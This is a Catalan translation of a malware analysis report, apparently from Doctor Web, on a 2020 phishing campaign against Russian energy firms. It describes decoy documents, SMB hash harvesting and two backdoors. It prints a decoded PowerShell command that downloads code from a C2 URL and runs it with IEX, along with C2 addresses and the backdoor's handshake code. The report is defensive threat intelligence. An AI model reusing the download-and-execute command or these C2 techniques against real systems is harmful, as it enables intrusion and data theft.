La nostra experiència en la investigació d'incidents de seguretat informàtica demostra que el correu electrònic segueix sent un dels canals més habituals que utilitzen els atacants per penetrar inicialment en infraestructures de xarxa atacades. Una acció descuidada amb una carta sospitosa (o no tan sospitosa) es converteix en un punt d'entrada per a més infeccions, i és per això que els ciberdelinqüents utilitzen activament mètodes d'enginyeria social, encara que amb diferents graus d'èxit.
En aquesta publicació volem parlar de la nostra investigació recent sobre una campanya de correu brossa dirigida a diverses empreses del complex de combustible i energia rus. Tots els atacs van seguir el mateix escenari amb correus electrònics falsos, i ningú semblava haver posat molt d'esforç en el contingut de text d'aquests correus electrònics.
Servei d'intel·ligència
Tot va començar a finals d'abril de 2020, quan els analistes de virus de Doctor Web van detectar una campanya de correu brossa en què els pirates informàtics enviaven un directori telefònic actualitzat als empleats d'una sèrie d'empreses del complex de combustible i energia rus. Per descomptat, això no va ser una simple mostra de preocupació, ja que el directori no era real i els documents .docx baixaven dues imatges de recursos remots.
Un d'ells es va descarregar a l'ordinador de l'usuari des del servidor de notícies[.]zannews[.]com. Cal destacar que el nom de domini és similar al domini del centre de mitjans anticorrupció de Kazakhstan - zannews[.]kz. D'altra banda, el domini utilitzat va recordar immediatament una altra campanya del 2015 coneguda com TOPNEWS, que utilitzava una porta posterior ICEFOG i tenia dominis de control de troians amb la subcadena "notícies" als seus noms. Una altra característica interessant va ser que quan s'enviaven correus electrònics a diferents destinataris, les sol·licituds per descarregar una imatge utilitzaven diferents paràmetres de sol·licitud o noms d'imatges únics.
Creiem que això es va fer amb el propòsit de recopilar informació per identificar un destinatari "fiable", que tindria la garantia d'obrir la carta en el moment adequat. Es va utilitzar el protocol SMB per descarregar la imatge del segon servidor, cosa que es podria fer per recollir hash NetNTLM dels ordinadors dels empleats que van obrir el document rebut.
I aquí teniu la carta amb el directori fals:
El juny d'aquest any, els pirates informàtics van començar a utilitzar un nou nom de domini, sports[.]manhajnews[.]com, per penjar imatges. L'anàlisi va mostrar que els subdominis manhajnews[.]com s'han utilitzat en correu brossa des d'almenys el setembre de 2019. Un dels objectius d'aquesta campanya era una gran universitat russa.
A més, al juny, els organitzadors de l'atac van presentar un nou text per a les seves cartes: aquesta vegada el document contenia informació sobre el desenvolupament de la indústria. El text de la carta indicava clarament que el seu autor no era un parlant nadiu de rus o estava creant deliberadament aquesta impressió sobre ell mateix. Malauradament, les idees del desenvolupament de la indústria, com sempre, van resultar ser només una portada: el document va tornar a descarregar dues imatges, mentre que el servidor es va canviar per descarregar[.]inklingpaper[.]com.
La següent innovació va seguir al juliol. En un intent d'evitar la detecció de documents maliciosos per part dels programes antivirus, els atacants van començar a utilitzar documents de Microsoft Word xifrats amb una contrasenya. Al mateix temps, els atacants van decidir utilitzar una tècnica clàssica d'enginyeria social: notificació de recompensa.
El text del recurs es va tornar a redactar amb el mateix estil, fet que va despertar més recels entre el destinatari. El servidor per descarregar la imatge tampoc no ha canviat.
Tingueu en compte que, en tots els casos, per enviar cartes s'utilitzaven les bústies electròniques registrades als dominis mail[.]ru i yandex[.]ru.
Atac
A principis de setembre de 2020, era el moment de l'acció. Els nostres analistes de virus van registrar una nova onada d'atacs, en què els atacants van tornar a enviar cartes amb el pretext d'actualitzar una guia telefònica. Tanmateix, aquesta vegada el fitxer adjunt contenia una macro maliciosa.
En obrir el document adjunt, la macro va crear dos fitxers:
- Script VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, que tenia la intenció de llançar un fitxer per lots;
- El mateix fitxer per lots %APPDATA%configstest.bat, que s'ha ofuscat.
L'essència del seu treball es redueix a llançar el shell Powershell amb determinats paràmetres. Els paràmetres passats a l'intèrpret d'ordres es descodifiquen en ordres:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Com es desprèn de les ordres presentades, el domini des del qual es descarrega la càrrega útil es torna a disfressar de lloc de notícies. Un senzill , l'única tasca del qual és rebre el codi intèrpret d'ordres del servidor d'ordres i control i executar-lo. Hem pogut identificar dos tipus de portes del darrere que es poden instal·lar a l'ordinador de la víctima.
BackDoor.Siggen2.3238
El primer és BackDoor.Siggen2.3238 — Els nostres especialistes no s'havien trobat abans, i tampoc hi havia mencions d'aquest programa per part d'altres venedors d'antivirus.
Aquest programa és una porta posterior escrita en C++ i que s'executa en sistemes operatius Windows de 32 bits.
BackDoor.Siggen2.3238 és capaç de comunicar-se amb el servidor de gestió mitjançant dos protocols: HTTP i HTTPS. La mostra provada utilitza el protocol HTTPS. El següent User-Agent s'utilitza a les sol·licituds al servidor:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
En aquest cas, totes les sol·licituds es proporcionen amb el següent conjunt de paràmetres:
%s;type=%s;length=%s;realdata=%send
on cada línia %s es substitueix corresponentment per:
- ID de l'ordinador infectat,
- tipus de sol·licitud enviada,
- longitud de les dades al camp de dades reals,
- dades.
En l'etapa de recollida d'informació sobre el sistema infectat, la porta del darrere genera una línia com:
lan=%s;cmpname=%s;username=%s;version=%s;
on lan és l'adreça IP de l'ordinador infectat, cmpname és el nom de l'ordinador, nom d'usuari és el nom d'usuari, versió és la línia 0.0.4.03.
Aquesta informació amb l'identificador sysinfo s'envia mitjançant una sol·licitud POST al servidor de control situat a https[:]//31.214[.]157.14/log.txt. Si en resposta BackDoor.Siggen2.3238 rep el senyal HEART, la connexió es considera correcta i la porta posterior comença el cicle principal de comunicació amb el servidor.
Descripció més completa dels principis de funcionament BackDoor.Siggen2.3238 està al nostre .
BackDoor.Whitebird.23
El segon programa és una modificació de la backdoor BackDoor.Whitebird, ja coneguda per l'incident amb una agència governamental a Kazakhstan. Aquesta versió està escrita en C++ i està dissenyada per funcionar amb sistemes operatius Windows de 32 i 64 bits.
Com la majoria de programes d'aquest tipus, BackDoor.Whitebird.23 dissenyat per establir una connexió xifrada amb el servidor de control i control no autoritzat d'un ordinador infectat. Instal·lat en un sistema compromès mitjançant un comptagotes .
La mostra que vam examinar era una biblioteca maliciosa amb dues exportacions:
- Google Play
- Prova
Al començament del seu treball, desxifra la configuració connectada al cos de la porta posterior mitjançant un algorisme basat en l'operació XOR amb el byte 0x99. La configuració sembla:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Per garantir el seu funcionament constant, la porta del darrere canvia el valor especificat al camp hores de feina configuracions. El camp conté 1440 bytes, que prenen els valors 0 o 1 i representen cada minut de cada hora del dia. Crea un fil separat per a cada interfície de xarxa que escolta la interfície i cerca paquets d'autorització al servidor intermediari des de l'ordinador infectat. Quan es detecta aquest paquet, la porta posterior afegeix informació sobre el servidor intermediari a la seva llista. A més, comprova la presència d'un proxy mitjançant WinAPI InternetQueryOptionW.
El programa comprova el minut i l'hora actuals i els compara amb les dades del camp hores de feina configuracions. Si el valor del minut corresponent del dia no és zero, s'estableix una connexió amb el servidor de control.
L'establiment d'una connexió al servidor simula la creació d'una connexió mitjançant el protocol TLS versió 1.0 entre el client i el servidor. El cos de la porta del darrere conté dos buffers.
El primer buffer conté el paquet TLS 1.0 Client Hello.
La segona memòria intermèdia conté paquets d'intercanvi de claus de client TLS 1.0 amb una longitud de clau de 0x100 bytes, especificació de xifratge de canvi, missatge de connexió de mà xifrat.
Quan s'envia un paquet de Client Hello, la porta posterior escriu 4 bytes de l'hora actual i 28 bytes de dades pseudoaleatòries al camp Client Random, calculats de la següent manera:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
El paquet rebut s'envia al servidor de control. La resposta (paquet Server Hello) comprova:
- compliment del protocol TLS versió 1.0;
- correspondència de la marca de temps (els primers 4 bytes del camp del paquet de dades aleatòries) especificada pel client amb la marca de temps especificada pel servidor;
- coincidència dels primers 4 bytes després de la marca de temps al camp Dades aleatòries del client i del servidor.
En cas de les coincidències especificades, la porta posterior prepara un paquet d'intercanvi de claus de client. Per fer-ho, modifica la clau pública del paquet d'intercanvi de claus de client, així com les dades de xifratge IV i xifratge del paquet de missatges d'enllaç xifrat.
Aleshores, la porta del darrere rep el paquet del servidor d'ordres i control, comprova que la versió del protocol TLS és 1.0 i després accepta altres 54 bytes (el cos del paquet). Això completa la configuració de la connexió.
Descripció més completa dels principis de funcionament BackDoor.Whitebird.23 està al nostre .
Conclusió i conclusions
L'anàlisi de documents, programari maliciós i la infraestructura utilitzada ens permet dir amb confiança que l'atac va ser preparat per un dels grups xinesos de l'APT. Tenint en compte la funcionalitat de les portes del darrere que s'instal·len als ordinadors de les víctimes en cas d'un atac reeixit, la infecció condueix, com a mínim, al robatori d'informació confidencial dels ordinadors de les organitzacions atacades.
A més, un escenari molt probable és la instal·lació de troians especialitzats en servidors locals amb una funció especial. Aquests podrien ser controladors de domini, servidors de correu, passarel·les d'Internet, etc. Com podem veure a l'exemple , aquests servidors són d'interès particular per als atacants per diverses raons.
Font: www.habr.com